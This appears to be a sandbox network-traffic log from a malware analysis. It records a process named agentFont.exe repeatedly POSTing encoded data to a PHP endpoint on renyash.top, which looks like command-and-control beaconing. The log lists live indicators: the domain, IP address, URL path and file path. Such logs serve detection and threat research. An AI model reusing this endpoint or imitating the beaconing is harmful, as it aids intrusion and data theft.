Jan 1, 2025 11:27:35.974225044 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49759 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:36.147376060 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:36.502698898 CET | 1044 | OUT | Data Raw: [encoded request body]
                                                                                  Jan 1, 2025 11:27:36.803363085 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:37.129834890 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W
                                                                                  Jan 1, 2025 11:27:37.129868031 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  23 | 192.168.2.4 | 49760 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:36.165039062 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:36.518277884 CET | 1340 | OUT | Data Raw: [encoded request body]
                                                                                  Jan 1, 2025 11:27:36.805473089 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:37.129849911 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: [encoded response body]
                                                                                  Jan 1, 2025 11:27:37.129858971 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: [encoded response body]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  24 | 192.168.2.4 | 49761 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:37.284965992 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:37.643317938 CET | 1044 | OUT | Data Raw: [encoded request body]
                                                                                  Jan 1, 2025 11:27:37.941657066 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:38.074311018 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  25 | 192.168.2.4 | 49762 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:38.214088917 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:38.565242052 CET | 1044 | OUT | Data Raw: [encoded request body]
                                                                                  Jan 1, 2025 11:27:38.851011038 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:38.982659101 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:35 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  26 | 192.168.2.4 | 49763 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:39.115469933 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:39.471426964 CET | 1040 | OUT | Data Raw: [encoded request body]
                                                                                  Jan 1, 2025 11:27:39.752813101 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:39.882049084 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  27 | 192.168.2.4 | 49764 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:40.032679081 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:40.377691031 CET | 1044 | OUT | Data Raw: [encoded request body]
                                                                                  Jan 1, 2025 11:27:40.668876886 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:40.798018932 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  28 | 192.168.2.4 | 49765 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:40.928271055 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:41.284043074 CET | 1044 | OUT | Data Raw: [encoded request body]
                                                                                  Jan 1, 2025 11:27:41.561975002 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:41.689655066 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:38 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  29 | 192.168.2.4 | 49766 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:41.825207949 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  30 | 192.168.2.4 | 49767 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:42.149741888 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:42.502964020 CET | 1340 | OUT | Data Raw: [encoded request body]
                                                                                  Jan 1, 2025 11:27:42.789659023 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:42.918970108 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: [encoded response body]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  31 | 192.168.2.4 | 49768 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:42.396454096 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:42.759423971 CET | 1044 | OUT | Data Raw: [encoded request body]
                                                                                  Jan 1, 2025 11:27:43.043335915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:43.171889067 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  32 | 192.168.2.4 | 49769 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:43.374691963 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:43.721446037 CET | 1044 | OUT | Data Raw: [encoded request body]
                                                                                  Jan 1, 2025 11:27:44.020859003 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:44.188510895 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:40 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  33 | 192.168.2.4 | 49770 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:44.321674109 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:44.674659967 CET | 1044 | OUT | (request body)
                                                                                  Jan 1, 2025 11:27:44.986103058 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:45.123768091 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  34 | 192.168.2.4 | 49771 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:45.256104946 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:45.618340969 CET | 1044 | OUT | (request body)
                                                                                  Jan 1, 2025 11:27:45.911818981 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:46.050118923 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  35 | 192.168.2.4 | 49772 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:46.237535000 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:46.596477032 CET | 1044 | OUT | (request body)
                                                                                  Jan 1, 2025 11:27:46.875072002 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:47.006314039 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:43 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  36 | 192.168.2.4 | 49773 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:47.138432026 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:47.487095118 CET | 1040 | OUT | (request body)
                                                                                  Jan 1, 2025 11:27:47.803410053 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:47.935796976 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:44 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  37 | 192.168.2.4 | 49774 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:47.946681023 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:48.299663067 CET | 1340 | OUT | (request body)
                                                                                  Jan 1, 2025 11:27:48.588768959 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:48.718908072 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:45 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  38 | 192.168.2.4 | 49775 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:48.088246107 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:48.440243959 CET | 1044 | OUT | (request body)
                                                                                  Jan 1, 2025 11:27:48.743572950 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:48.877841949 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:45 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  39 | 192.168.2.4 | 49776 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:49.006201982 CET | 302 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:49.362082958 CET | 1044 | OUT | (request body)
                                                                                  Jan 1, 2025 11:27:49.764300108 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:49.918359995 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:46 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  40 | 192.168.2.4 | 49777 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:50.051424980 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:50.410548925 CET | 1044 | OUT | (request body)
                                                                                  Jan 1, 2025 11:27:50.696917057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:50.827826977 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  41 | 192.168.2.4 | 49778 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:51.331902981 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:51.690320015 CET | 1044 | OUT | (request body)
                                                                                  Jan 1, 2025 11:27:51.968502998 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:52.102289915 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:48 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  42 | 192.168.2.4 | 49779 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 1, 2025 11:27:52.223356009 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1044
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:52.580967903 CET | 1044 | OUT | (request body)
                                                                                  Jan 1, 2025 11:27:52.868182898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:52.999860048 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:49 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 30 52 5e 57
                                                                                  Data Ascii: 0R^W


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49780 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:53.130549908 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1040
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
Jan 1, 2025 11:27:53.788299084 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49781 | 185.158.202.52 | 80 | 1136 | C:\mshypercomponentSavesdll\agentFont.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 11:27:53.797086000 CET | 326 | OUT | POST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
